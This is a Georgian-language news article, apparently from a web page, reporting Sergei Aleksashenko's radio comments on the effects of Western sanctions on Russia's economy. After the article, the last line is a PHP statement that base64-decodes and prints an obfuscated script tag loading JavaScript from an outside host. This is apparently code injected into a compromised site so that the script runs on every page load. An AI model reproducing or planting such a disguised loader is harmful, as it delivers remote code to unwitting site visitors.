celsiusi
ავერსი შნაიდერი
რუსეთის ფინანსთა მინისტრის ყოფილი მოადგილეს და  რუსეთის ცენტრალური ბანკის თავმჯდომარის ყოფილი პირველი მოადგილეს (1995-1998წწ), სერგეი ალექსაშენკოს განცხადებით, საჭიროა გავიგოთ ის, რომ რუსეთის ეკონომიკა ძალიან დიდი მექანიზმია და დიდ სანქციებსაც კი არ შეუძლიათ მყისიერი გავლენა მოახდინოს ეკონომიკაზე. ამის შესახებ მან რადიო „მაესტროს“ განუცხადა.
 
მისივე თქმით, სიტყვები მისი პუბლიკაციიდან იმის შესახებ, რომ ამერიკის მიერ დაწესებული სანცქიები ფორმალურია, ეხებოდა სანქციების ერთ-ერთ ტალღას და ის არ ეხებოდა დღეს ამოქმედებულ სანქციებს. 
 
“ჩემი შეფასებით, დღეს არსებული სანქციები, რომელიც ამერიკის შეერთებულმა შტატებმა, ევროკავშირმა, დიდმა ბრიტანეთმა, კანადამ რუსეთის წინააღმდეგ გამოიყენეს არის ძალიან მკაცრი, ეს სანქციები ბევრად ძლიერია, ვიდრე 2014 წელს რუსეთის წინაარმდეგ იყო გამოყენებული. დღეს არსებული სანქციები რუსეთის ეკონომიკას ბევრად სერიოზულ ზარალს აყენებს, ვიდრე 8 წლის წინ. უბრალოდ, საჭიროა გავიგოთ ის, რომ რუსეთის ეკონომიკა ძალიან დიდი მექანიზმია და დიდ სანქციებსაც კი არ შეუძლიათ მყისიერი გავლენა მოახდინოს ეკონომიკაზე. ეს არ არის სარაკეტო დარტყმა, რომლის გამოყენების დროს მყისიერად ნადგურდება მიზანი. სანქციების ეფექტურობა ნელ-ნელა, რემდენიმე ეტაპით ვლინდება რუსეთის ეკონომიკაზე. პირველი ეტაპი, რომელიც უკვე სახეზეა - ეს არის ინფლაციის მკვეთრი ზრდა. ინფლაციამ მყისიერად დაიწყო ზრდა, უნდა გავიხსენოთ ის, რომ 2014 წელს ინფლაციის დაწევა რომ მომხდარიყო 4%-მდე, ამისათვის 6 თვე გახდა საჭირო. დღეს კი, სანქციების პირველივე კვირიდან თვიურმა ინფლაციამ 8%-ს გადააჭარბა.“ - განაცხადა ალექსაშენკომ.
 
მისივე თქმით, ყველაზე სერიოზულ სანქციებზე თუ ვისაუბრებთ, აქ რა თქმა უნდა, რუსეთსა და მსოფლიო გლობალურ ეკონომიკას შორის ტექნოლოგიური ურთიერთობების გაჩერება ყველაზე მძიმეა რუსეთის ეკონომიკისთვის.
 
„მე მგონია, რომ როგორც დიმიტრი მედვედევის, ასევე რუსი ჩინოვნიკების გაგება შესაძლებელია, რომლებიც აცხადებენ, რომ რუსეთის ეკონომიკაში ყველაფერი კარგად არის და სანქციები ვერაფერს დაგვაკლებს. რომ იმპორტის ჩანაცვლებით ჩვენ უფრო გავძლიერდებით. გასაგებია, რომ მათ არ შეუძლიათ იმის აღიარება, რომ სანქციების შედეგად რუსეთის ეკონომიკა გაკოტრების ზღვარზეა და ეკონომიკამ 30-40 წლით უკან  დაიხია. რუსეთის ეკონომიკა გარკვეული სანქციებისთვის შეიძლება მომზადებულიყო, პირველ რიგში ეს შესაძლოა  ყოფილიყო თავდაცვითი ინდუსტრისთვის ყველაზე მნიშვნელოვანი კომპონეტების უზრუნველყოფით მომზადებულიყო, ამ მიმართულებით, დარწმუნებული ვარ, შესაძლებელი იქნებოდა გარკვეული მარაგების მობილიზება, იმისათვის რომ საწარმოების მუშაობა არ შეფერხებულიყო. იქიდან გამომდინარე, თუ რა რეაქცია ჰქონდა რუსეთის ხელისუფლებას, როგორი რეაქცია ჰქონდა რუსეთის სავალუტო ბაზარს სანქციებზე, შეიძლება ითქვას, რომ ცენტრალური და მსხვილი ბანკები იყვნენ მზად იმისთვის, რომ რომელიმე მათგანი გაითიშებოდა ბანკთაშორისი კომუნიკაციის საერთაშორისო სისტემიდან, სწორედ ამის გათვალისწინებით იყო შექმნილი უხილავი შიდა სისტემა, რომელიც გარე თვალისთვის შეუმჩნეველი იყო, როდესაც ყველა ბანკი, მათშორის ისინიც კი რომლებიც სანქციების ქვეშ არიან, შეუძლიათ გადახდები აწარმოონ ამ უხილავი სისტემის მეშვეობით. ამავდროულად, ის გადაწყვეტილებები, რომელიც იყო რუსეთის ხელისუფლების მიერ მიღებული შეიძლება შეფასდეს როგორც ქაოტური. ბოლო, ყველაზე მოულოდნელი რუსეთის ხელისუფლებისთვის და ეკონომიკისთვის, უბრალო დამკვირვებელისთვისაც მორალური სანქციები იყო, როდესაც ათასამდე დასავლური  კომპანია იღებდა გადაწყვეტილებას რუსეთის ბაზრიდან გასვლის ან საქმიანობის შეჩერების შესახებ. რუსეთში ზოგადად იყო ასეთი განწყობები, რომ დასავლური კომპანიების ყიდვა ყოველთვის შეიძლება, უფრო მეტის შოვნის შესაძლებლობის მიცემის შემთხვევაში, ისინი ყველა შემთხვევაში დარჩებოდნენ, როგორც მოხდა 2008 წლის საქართველოსთან ომის შემდეგ ან როგორც ეს იყო 2014 წლის ყირიმის ანექსიის შემდეგ. მაგრამ გაირკვა, რომ არსებობს რაღაც ზღვარი, რომლის იქით დასავლური კომპანიები არ შეუძლიათ წავიდნენ. ვფიქრობ, რომ ყველასთვის ,ყველაზე მოულოდნელი  სწორედ ეს იყო.- განაცხადა ალექსაშენკომ.
 
 
964
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");